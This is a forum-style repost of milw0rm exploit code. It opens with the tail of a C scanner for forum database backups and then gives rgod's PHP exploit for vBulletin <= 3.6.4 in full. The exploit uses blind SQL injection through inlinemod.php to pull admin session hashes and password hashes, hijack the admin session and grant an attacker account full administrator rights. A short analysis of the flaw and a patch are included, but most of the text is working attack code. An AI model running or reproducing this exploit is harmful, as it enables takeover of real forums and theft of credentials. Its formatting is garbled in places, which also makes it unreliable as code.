snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate2(i),host,http);
   } else if ( 
== ) {
   
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate3(i),host,http);
   } else if ( 
== ) {
   
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate4(i),host,http);
   } else if ( 
== ) {
   
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate5(i),host,http);
   } else if ( 
== ) {
   
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate6(i),host,http);
   } else if ( 
== ) {
   
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate7(i),host,http);
   }

   
rc send(sd,bufferstrlen(buffer), 0);
   
memset(buffer,0,sizeof(buffer));

while(
1)
       {
       
rc=recv(sd,buffer,sizeof(buffer),0);
       if(
strstr(buffer,"404")) break;
       if(
strstr(buffer,"200 OK"))
               {
           if ( 
== ) {
               
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate(i));
           }
           if ( 
== ) {
               
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate2(i));
           }
           if ( 
== ) {
               
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate3(i));
           }
           if ( 
== ) {
           
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate4(i));
           }
           if ( 
== ) {
           
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate5(i));
           }
           if ( 
== ) {
           
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate6(i));
           }
           if ( 
== ) {
           
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate7(i));
           }
               exit(
0);
               }
       
memset(buffer,0,sizeof(buffer));
       } 
close(sd);

if ( 
) {
    
d++;
} else {
    
d=0;
        
i++;
}
}
}
  
// milw0rm.com [2005-08-31]  
rgod/vBulletin <= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit

Código PHP:
<?php
print_r
('
-----------------------------------------------------------------------------
vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
escalation by session hijacking exploit
by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org

Works regardless of php.ini settings, you need a Super Moderator account
to copy posts among threads, to be launched while admin is logged in to
the control panel, this will give you full admin privileges
note: this will flood the forum with empty threads even!
-----------------------------------------------------------------------------
'
);

if (
$argc<7) { print_r('
-----------------------------------------------------------------------------
Usage: php '
.$argv[0].' host path user pass forumid postid OPTIONS
host:      target server (ip/hostname)
path:      path to vbulletin
user/pass: you need a moderator account
forumid:   existing forum
postid:    existing post
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '
.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
php '
.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
-----------------------------------------------------------------------------
'
);
die;
/*
vulnerable code in inlinemod.php near lines 185-209:

...
    case 'docopyposts':

        $vbulletin->input->clean_array_gpc('p', array(
            'postids' => TYPE_STR,
        ));

        $postids = explode(',', $vbulletin->GPC['postids']);
        foreach ($postids AS $index => $postid)
        {
            if ($postids["$index"] != intval($postid))
            {
                unset($postids["$index"]);
            }
        }

        if (empty($postids))
        {
            eval(standard_error(fetch_error('no_applicable_posts_selected')));
        }

        if (count($postids) > $postlimit)
        {
            eval(standard_error(fetch_error('you_are_limited_to_working_with_x_posts', $postlimit)));
        }
        break;
...
when an element of $postids array is not an integer, it fails to unset() the proper value.

An example:

<?php
$foo[1]="99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/*";
$foo[2]=intval($foo[1]);

echo $foo[1]."\n";
echo $foo[2]."\n";
if ($foo[1] != $foo[2])
{
 echo "they are different";
}
else
{
 echo "they match!";
}
?>

output:

99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/*
99999
they match!

this because when php tries to comparise a string with an integer
it tries to convert the string in its integer value, it chooses the first integer chars
of the string itself!
so unset() never run!

the result is sql injection near lines 3792-3800:

...
    $posts = $db->query_read_slave("
        SELECT post.postid, post.threadid, post.visible, post.title, post.username, post.dateline, post.parentid, post.userid,
            thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid,
            thread.sticky, thread.open, thread.iconid
        FROM " . TABLE_PREFIX . "post AS post
        LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid)
        WHERE postid IN (" . implode(',', $postids) . ")
        ORDER BY post.dateline
    ");
...

this exploit extract various session hashes from the database
to authenticate as admin and to change the privileges of a registered user
I could not find a way to see results inside html, so this asks true/false
questions to the database, copying posts around threads

possible patch, replace:
foreach ($postids AS $index => $postid)
        {
            if ($postids["$index"] != intval($postid))
            {
                unset($postids["$index"]);
            }
        }

with:

foreach ($postids AS $index => $postid)
        {
           $postids["$index"]=(int)$postids["$index"];
        }


and, some line before:

foreach ($threadids AS $index => $threadid)
        {
            if ($threadids["$index"] != intval($threadid))
            {
                unset($threadids["$index"]);
            }
        }

with:

foreach ($threadids AS $index => $threadid)
        {
           $threadids["$index"]=(int)$threadids["$index"];
        }


vendor was contacted by email form...
*/
  
error_reporting(7); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5);

function 
quick_dump($string)
{
  
$result='';$exa='';$cont=0;
  for (
$i=0$i<=strlen($string)-1$i++)
  {
   if ((
ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {
$result.="  .";}
   else
   {
$result.="  ".$string[$i];}
   if (
strlen(dechex(ord($string[$i])))==2)
   {
$exa.=" ".dechex(ord($string[$i]));}
   else
   {
$exa.=" 0".dechex(ord($string[$i]));}
   
$cont++;if ($cont==15) {$cont=0$result.="\r\n"$exa.="\r\n";}
  }
 return 
$exa."\r\n".$result;
$proxy_regex '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function 
sendpacketii($packet)
{
  global 
$proxy$host$port$html$proxy_regex;
  if (
$proxy=='') {
    
$ock=fsockopen(gethostbyname($host),$port);
    if (!
$ock) {
      echo 
'No response from '.$host.':'.$port; die;
    }
  }
  else {
    
$c preg_match($proxy_regex,$proxy);
    if (!
$c) {
      echo 
'Not a valid proxy...';die;
    }
    
$parts=explode(':',$proxy);
    echo 
"Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    
$ock=fsockopen($parts[0],$parts[1]);
    if (!
$ock) {
      echo 
'No response from proxy...';die;
    }
  }
  
fputs($ock,$packet);
  if (
$proxy=='') {
    
$html='';
    while (!
feof($ock)) {
      
$html.=fgets($ock);
    }
  }
  else {
    
$html='';
    while ((!
feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      
$html.=fread($ock,1);
    }
  }
  
fclose($ock);
}
  
$host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=md5($argv[4]); $forumid=(int)$argv[5]; $existing_post=(int)$argv[6];
  
$port=80$proxy="";
for (
$i=3$i<$argc$i++){ $temp=$argv[$i][0].$argv[$i][1];
if ((
$temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if (
$temp=="-p")
{
  
$port=str_replace("-p","",$argv[$i]);
}
if (
$temp=="-P")
{
  
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ((
$path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if (
$proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  
$data="vb_login_username=$user"$data.="&vb_login_password="$data.="&s="$data.="&do=login"$data.="&vb_login_md5password=$pass"$data.="&vb_login_md5password_utf=$pass"$packet="POST ".$p."login.php HTTP/1.0\r\n"$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"$packet.="Referer: http://".$host.$path."login.php\r\n"$packet.="Accept-Language: en\r\n"$packet.="Content-Type: application/x-www-form-urlencoded\r\n"$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"$packet.="Host: ".$host."\r\n"$packet.="Content-Length: ".strlen($data)."\r\n"$packet.="Pragma: no-cache\r\n"$packet.="Connection: Close\r\n\r\n"$packet.=$datasendpacketii($packet); $cookie=""$temp=explode("Set-Cookie: ",$html);
for (
$i=1$i<count($temp); $i++)
{
  
$temp2=explode(" ",$temp[$i]);
  
$cookie.=" ".trim($temp2[0]);
//echo "your cookie -> ".$cookie."\n\n"; if (!eregi("sessionhash",$cookie)){die("failed to login...");}$temp=str_replace(" ","",$cookie);$temp=str_replace("sessionhash","",$temp); $temp=str_replace("lastvisit","",$temp);$temp=str_replace("lastactivity","",$temp);$temp=explode("=",$temp);$temp=explode(";",$temp[1]);$cookie_prefix=trim($temp[1]);echo "cookie prefix -> ".$cookie_prefix."\n";
  
$chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers
  
$j=1;$uid="";
echo 
"admim user id -> ";
while (!
strstr($uid,chr(0)))
{
    for (
$i=0$i<=255$i++)
    {
        if (
in_array($i,$chars))
        {
          
$data ="s=";
          
$data.="&do=docopyposts";
          
$data.="&destforumid=$forumid";
          
$data.="&title=suntzu";
          
$data.="&forumid=$forumid";
          
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/usergroupid=6/**/LIMIT/**/1/*";
          
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
          
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          
$packet.="Referer: http://".$host.$path."profile.php\r\n";
          
$packet.="Accept-Language: it\r\n";
          
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Host: ".$host."\r\n";
          
$packet.="Content-Length: ".strlen($data)."\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="Cookie: ".$cookie."; \r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
$packet.=$data;
          
sendpacketii($packet);
          
$temp=explode("showthread.php?t=",$html);
          
$temp2=explode("\n",$temp[1]);
          
$thread=(int)$temp2[0];

          
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
          
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          
$packet.="Referer: http://".$host.$path."profile.php\r\n";
          
$packet.="Accept-Language: it\r\n";
          
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Host: ".$host."\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="Cookie: ".$cookie."; \r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
sendpacketii($packet);
          if (
eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");}
          if (
eregi("join date",$html)) {$uid.=chr($i);echo chr($i); sleep(1); break;}
        }
        if (
$i==255) {
            die(
"\nExploit failed...");
        }
    } 
$j++;
}
if (
trim($uid)==""){die("\nExploit failed...");}else{echo "\nvulnerable!";} $uid=intval($uid);

function 
my_encode($my_string)
{
  
$encoded="CHAR(";
  for (
$k=0$k<=strlen($my_string)-1$k++)
  {
    
$encoded.=ord($my_string[$k]);
    if (
$k==strlen($my_string)-1) {$encoded.=")";}
    else {
$encoded.=",";}
  }
  return 
$encoded;
}

  
$j=1;$my_uid="";
echo 
"\nyour user id -> ";
while (!
strstr($my_uid,chr(0)))
{
    for (
$i=0$i<=255$i++)
    {
        if (
in_array($i,$chars))
        {
          
$data ="s=";
          
$data.="&do=docopyposts";
          
$data.="&destforumid=$forumid";
          
$data.="&title=suntzu";
          
$data.="&forumid=$forumid";
          
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/username=".my_encode($user)."/**/LIMIT/**/1/*";
          
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
          
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          
$packet.="Referer: http://".$host.$path."profile.php\r\n";
          
$packet.="Accept-Language: it\r\n";
          
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Host: ".$host."\r\n";
          
$packet.="Content-Length: ".strlen($data)."\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="Cookie: ".$cookie."; \r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
$packet.=$data;
          
sendpacketii($packet);
          if (
eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");}
          
$temp=explode("showthread.php?t=",$html);
          
$temp2=explode("\n",$temp[1]);
          
$thread=(int)$temp2[0];

          
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
          
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          
$packet.="Referer: http://".$host.$path."profile.php\r\n";
          
$packet.="Accept-Language: it\r\n";
          
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Host: ".$host."\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="Cookie: ".$cookie."; \r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
sendpacketii($packet);
          if (
eregi("join date",$html)) {$my_uid.=chr($i);echo chr($i); sleep(1); break;}
        }
        if (
$i==255) {
            die(
"\nExploit failed...");
        }
    } 
$j++;
$my_uid=intval($my_uid);
  
$chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $chars=array_merge($chars,range(97,102));//a-f letters $j=1;$sess_hash="";
echo 
"\nsession hash -> ";
while (!
strstr($sess_hash,chr(0)))
{
    for (
$i=0$i<=255$i++)
    {
      if (
in_array($i,$chars))
        {
          
$data ="s=";
          
$data.="&do=docopyposts";
          
$data.="&destforumid=$forumid";
          
$data.="&title=suntzu";
          
$data.="&forumid=$forumid";
          
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(sessionhash,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/session/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*";
          
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
          
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          
$packet.="Referer: http://".$host.$path."profile.php\r\n";
          
$packet.="Accept-Language: it\r\n";
          
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Host: ".$host."\r\n";
          
$packet.="Content-Length: ".strlen($data)."\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="Cookie: ".$cookie."; \r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
$packet.=$data;
          
sendpacketii($packet);
          if (
eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");}
          
$temp=explode("showthread.php?t=",$html);
          
$temp2=explode("\n",$temp[1]);
          
$thread=(int)$temp2[0];

          
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
          
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          
$packet.="Referer: http://".$host.$path."profile.php\r\n";
          
$packet.="Accept-Language: it\r\n";
          
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Host: ".$host."\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="Cookie: ".$cookie."; \r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
sendpacketii($packet);
          if (
eregi("join date",$html)) {$sess_hash.=chr($i);echo chr($i); sleep(1); break;}
        }
        if (
$i==255) {
            die(
"\nExploit failed...");
        }
    } 
$j++;
}
  
$j=1;$my_hash="";
echo 
"\nuser password hash -> ";
while (!
strstr($my_hash,chr(0)))
{
    for (
$i=0$i<=255$i++)
    {
      if (
in_array($i,$chars))
        {
          
$data ="s=";
          
$data.="&do=docopyposts";
          
$data.="&destforumid=$forumid";
          
$data.="&title=suntzu";
          
$data.="&forumid=$forumid";
          
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*";
          
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
          
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          
$packet.="Referer: http://".$host.$path."profile.php\r\n";
          
$packet.="Accept-Language: en\r\n";
          
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Host: ".$host."\r\n";
          
$packet.="Content-Length: ".strlen($data)."\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="Cookie: ".$cookie."; \r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
$packet.=$data;
          
sendpacketii($packet);
          if (
eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");}
          
$temp=explode("showthread.php?t=",$html);
          
$temp2=explode("\n",$temp[1]);
          
$thread=(int)$temp2[0];

          
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
          
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          
$packet.="Referer: http://".$host.$path."profile.php\r\n";
          
$packet.="Accept-Language: en\r\n";
          
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Host: ".$host."\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="Cookie: ".$cookie."; \r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
sendpacketii($packet);
          if (
eregi("join date",$html)) {$my_hash.=chr($i);echo chr($i); sleep(1); break;}
        }
        if (
$i==255) {
            die(
"\nExploit failed...");
        }
    } 
$j++;
}
  
$j=1;$cpsess_hash="";
echo 
"\ncp session hash -> ";
while (!
strstr($cpsess_hash,chr(0)))
{
    for (
$i=0$i<=255$i++)
    {
      if (
in_array($i,$chars))
        {
          
$data ="s=";
          
$data.="&do=docopyposts";
          
$data.="&destforumid=$forumid";
          
$data.="&title=suntzu";
          
$data.="&forumid=$forumid";
          
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(hash,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cpsession/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*";
          
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
          
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          
$packet.="Referer: http://".$host.$path."profile.php\r\n";
          
$packet.="Accept-Language: en\r\n";
          
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Host: ".$host."\r\n";
          
$packet.="Content-Length: ".strlen($data)."\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="Cookie: ".$cookie."; \r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
$packet.=$data;
          
sendpacketii($packet);
          
$temp=explode("showthread.php?t=",$html);
          
$temp2=explode("\n",$temp[1]);
          
$thread=(int)$temp2[0];

          
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
          
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
          
$packet.="Referer: http://".$host.$path."profile.php\r\n";
          
$packet.="Accept-Language: en\r\n";
          
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Host: ".$host."\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="Cookie: ".$cookie."; \r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
sendpacketii($packet);
          if (
eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");}
          if (
eregi("join date",$html)) {$cpsess_hash.=chr($i);echo chr($i); sleep(1); break;}
        }
        if (
$i==255) {
            die(
"\nExploit failed...");
        }
    } 
$j++;
}
echo 
"\n";
  
$packet ="GET ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n"$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"$packet.="Referer: http://".$host.$path."profile.php\r\n"$packet.="Accept-Language: en\r\n"$packet.="Content-Type: application/x-www-form-urlencoded\r\n"$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"$packet.="Host: ".$host."\r\n"$packet.="Pragma: no-cache\r\n"$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; bbuserid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n";$packet.="Connection: Close\r\n\r\n"sendpacketii($packet); $temp=explode("adminhash\" value=\"",$html); $temp2=explode("\"",$temp[1]); $adminhash=$temp2[0];
echo 
"adminhash ->".$adminhash."\n";
if (
$adminhash<>"") {echo "\ndone! you are in... updating ".$user." rights";}
else {die(
"\nexploit failed...");}
  
//join to the Administrator group $my_email="suntzu@suntzu.com"$data ="do=update"$data.="&adminhash=$adminhash"$data.="&quicklinks=user.php%3Fdo%3Deditaccess%26u%3D".$my_uid$data.="&user%5Busername%5D=$user"$data.="&password="$data.="&user%5Bemail%5D=$my_email"$data.="&user%5Blanguageid%5D=0"$data.="&user%5Busertitle%5D=Admin"$data.="&user%5Bcustomtitle%5D=0"$data.="&user%5Bhomepage%5D="$data.="&user%5Bbirthday%5D%5Bmonth%5D=0"$data.="&user%5Bbirthday%5D%5Bday%5D="$data.="&user%5Bbirthday%5D%5Byear%5D="$data.="&user%5Bshowbirthday%5D=0"$data.="&user%5Bsignature%5D="$data.="&user%5Bicq%5D="$data.="&user%5Baim%5D="$data.="&user%5Byahoo%5D="$data.="&user%5Bmsn%5D="$data.="&user%5Bskype%5D="$data.="&options%5Bcoppauser%5D=0"$data.="&user%5Bparentemail%5D=$my_email"$data.="&user%5Breferrerid%5D="$data.="&user%5Bipaddress%5D="$data.="&user%5Bposts%5D=0"$data.="&userfield%5Bfield1%5D="$data.="&userfield%5Bfield2%5D="$data.="&userfield%5Bfield3%5D="$data.="&userfield%5Bfield4%5D="$data.="&user%5Busergroupid%5D=6";//primary usergroup, 6=Administrators $data.="&user%5Bdisplaygroupid%5D=-1"$data.="&user%5Bmembergroupids%5D%5B%5D=5";//secondary usergroup, 5=Super Moderators $data.="&options%5Bshowreputation%5D=1"$data.="&user%5Breputation%5D=10"$data.="&user%5Bwarnings%5D=0"$data.="&user%5Binfractions%5D=0"$data.="&user%5Bipoints%5D=0"$data.="&options%5Badminemail%5D=1"$data.="&options%5Bshowemail%5D=0"$data.="&options%5Binvisible%5D=0"$data.="&options%5Bshowvcard%5D=0"$data.="&options%5Breceivepm%5D=1"$data.="&options%5Breceivepmbuddies%5D=0"$data.="&options%5Bemailonpm%5D=0"$data.="&user%5Bpmpopup%5D=0"$data.="&options%5Bshowsignatures%5D=1"$data.="&options%5Bshowavatars%5D=1"$data.="&options%5Bshowimages%5D=1"$data.="&user%5Bautosubscribe%5D=-1"$data.="&user%5Bthreadedmode%5D=0"$data.="&user%5Bshowvbcode%5D=1"$data.="&user%5Bstyleid%5D=0"$data.="&adminoptions%5Badminavatar%5D=0"$data.="&adminoptions%5Badminprofilepic%5D=0"$data.="&user%5Btimezoneoffset%5D=0"$data.="&options%5Bdstauto%5D=1"$data.="&options%5Bdstonoff%5D=0"$data.="&user%5Bdaysprune%5D=-1"$data.="&user%5Bjoindate%5D%5Bmonth%5D=2"$data.="&user%5Bjoindate%5D%5Bday%5D=26"$data.="&user%5Bjoindate%5D%5Byear%5D=2007"$data.="&user%5Bjoindate%5D%5Bhour%5D=14"$data.="&user%5Bjoindate%5D%5Bminute%5D=39"$data.="&user%5Blastactivity%5D%5Bmonth%5D=2"$data.="&user%5Blastactivity%5D%5Bday%5D=26"$data.="&user%5Blastactivity%5D%5Byear%5D=2007"$data.="&user%5Blastactivity%5D%5Bhour%5D=14"$data.="&user%5Blastactivity%5D%5Bminute%5D=58"$data.="&user%5Blastpost%5D%5Bmonth%5D=0"$data.="&user%5Blastpost%5D%5Bday%5D="$data.="&user%5Blastpost%5D%5Byear%5D="$data.="&user%5Blastpost%5D%5Bhour%5D="$data.="&user%5Blastpost%5D%5Bminute%5D="$data.="&userid=".$mu_uid$data.="&ousergroupid="$data.="&odisplaygroupid=0"$data.="&userfield%5Bfield1_set%5D=1"$data.="&userfield%5Bfield2_set%5D=1"$data.="&userfield%5Bfield3_set%5D=1"$data.="&userfield%5Bfield4_set%5D=1"$packet ="POST ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n"$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"$packet.="Referer: http://".$host.$path."profile.php\r\n"$packet.="Accept-Language: en\r\n"$packet.="Content-Type: application/x-www-form-urlencoded\r\n"$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"$packet.="Host: ".$host."\r\n"$packet.="Content-Length: ".strlen($data)."\r\n"$packet.="Pragma: no-cache\r\n"$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n";$packet.="Connection: Close\r\n\r\n"$packet.=$datasendpacketii($packet); sleep(1);
  
//now give full rights to the new Administrator $data ="do=update"$data.="&adminhash=".$adminhash$data.="&adminpermissions%5Bcanadminsettings%5D=1"$data.="&adminpermissions%5Bcanadminstyles%5D=1"$data.="&adminpermissions%5Bcanadminlanguages%5D=1"$data.="&adminpermissions%5Bcanadminforums%5D=1"$data.="&adminpermissions%5Bcanadminthreads%5D=1"$data.="&adminpermissions%5Bcanadmincalendars%5D=1"$data.="&adminpermissions%5Bcanadminusers%5D=1"$data.="&adminpermissions%5Bcanadminpermissions%5D=1"$data.="&adminpermissions%5Bcanadminfaq%5D=1"$data.="&adminpermissions%5Bcanadminimages%5D=1"$data.="&adminpermissions%5Bcanadminbbcodes%5D=1"$data.="&adminpermissions%5Bcanadmincron%5D=1"$data.="&adminpermissions%5Bcanadminmaintain%5D=1"$data.="&adminpermissions%5Bcanadminplugins%5D=1"$data.="&cssprefs="$data.="&dismissednews="$data.="&userid=".$my_uid$data.="&oldpermissions=98300"$data.="&adminpermissions%5Bcanadminupgrade%5D=0"$packet ="POST ".$p."admincp/adminpermissions.php?do=update HTTP/1.0\r\n"$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"$packet.="Referer: http://".$host.$path."profile.php\r\n"$packet.="Accept-Language: en\r\n"$packet.="Content-Type: application/x-www-form-urlencoded\r\n"$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"$packet.="Host: ".$host."\r\n"$packet.="Content-Length: ".strlen($data)."\r\n"$packet.="Pragma: no-cache\r\n"$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n";$packet.="Connection: Close\r\n\r\n"$packet.=$datasendpacketii($packet);
echo 
"\nnow go to http://".$host.$path."admincp/index.php and login to the control panel..."?> 
# milw0rm.com [2007-02-28]
